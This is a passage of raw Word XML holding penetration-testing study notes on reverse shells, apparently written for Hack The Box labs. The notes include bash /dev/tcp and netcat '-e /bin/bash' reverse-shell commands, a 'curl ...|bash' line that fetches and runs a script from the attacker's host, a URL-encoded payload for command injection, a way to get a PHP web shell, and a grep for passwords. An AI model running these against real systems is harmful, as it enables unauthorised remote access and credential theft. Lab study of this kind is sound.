        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo -e 'bash -i &gt;&amp; /dev/tcp/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10/4444</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0&gt;&amp;1' &gt; rev.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 8081</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lnvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run this command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10:8081</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/rev.sh|bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FA5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to replace the IP with your IP, and then the port with your </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PYTHON </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">port, not your reverse shell port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FA6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash reverse shell (used for command injection) (from Headless HTB):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FAB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc 10.10.14.41 4444 -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FAC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">+nc+10.10.14.41+4444+-e+/bin/bash </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1139"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For URL encoding</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lateral Movement:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FB0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1038"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use this to read many files at the same time for interesting stuff when we see many interesting file in the current directory we are in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1038"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat * | grep -i passw*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FB2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1038"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The -i flag in the grep command stands for "ignore case".</w:t>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ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>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t xml:space="preserve">PHP Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="526"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable functions include: eval(), include(), or exec()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="825"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One that can be found locally and worked was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/webshells/php/php-reverse-shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="825"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp /usr/share/webshells/php/php-reverse-shell.php ~</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="825"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This copies the php-reverse-shell into home (~)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FBC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="713"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId328">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FBD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="713"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also do this to download it to a file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="713"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -o [FILENAME].php https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FBF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="713"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">REMEMBER TO CHANGE THE IP AND PORT NUMBER</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FC0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="713"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And remember to make the IP equal to the IP of YOUR MACHINE, not the target machines! Since the reverse shell will be sent back to YOU</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Background Jobs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FC4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="857"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes, we will use CTRL + Z to background a shell. And then here is how to get the shell back from the background</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="857"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FC6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="857"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will list all the current jobs in background</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="857"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fg [number]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="857"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace number with the number associated with the job that you want to use from the background</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="857"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Typing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fg </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">without any arguments will get most recent background job</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F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D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pzko0tlv478l" w:id="133"/>
      <w:bookmarkEnd w:id="133"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading Reverse Shell</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FCE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">USE PENELOPE: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId329">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/brightio/penelope</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Important: When setting up a reverse shell, make sure to set the IP to YOUR IP, and not the target machine, since the reverse shell will be sent back to you!</w:t>
      </w:r>
    </w:p>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to upgrade shell </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">guide</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FD4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="596"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId330">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FD5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another guide: </w:t>
      </w:r>
      <w:hyperlink r:id="rId331">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://wiki.zacheller.dev/pentest/privilege-escalation/spawning-a-tty-shell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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tip: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="522"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the /bin/bash doesn't work, just try replacing it with /bin/sh</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t xml:space="preserve">Here's what I do:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FDD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FDE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FDF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="219"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import pty; pty.spawn("/bin/sh")'</w:t>
      </w:r>
    </w:p>
